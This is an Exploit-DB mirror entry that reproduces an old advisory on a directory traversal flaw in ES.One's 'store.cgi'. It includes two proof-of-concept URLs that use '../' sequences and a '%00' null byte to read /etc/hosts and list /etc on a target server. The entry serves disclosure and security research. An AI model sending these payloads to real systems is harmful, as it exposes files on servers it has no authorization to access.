exploit-db-mirror/exploits/linux/remote/20636.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

11 lines
No EOL
535 B
Text

source: http://www.securityfocus.com/bid/2385/info
It is possible for a remote user to gain read access to directories and files outside the root directory of ES.One. Requesting a specially crafted URL by way of 'store.cgi', composed of '/../' sequences and appended with '%00' will disclose an arbitrary directory.
http://target/cgi-bin/store.cgi?StartID=../etc/hosts%00.html
^^ = Will obviously open the hosts file.
http://target/cgi-bin/store.cgi?StartID=../etc/%00.html
^^ = Will obviously list the /etc/ directory.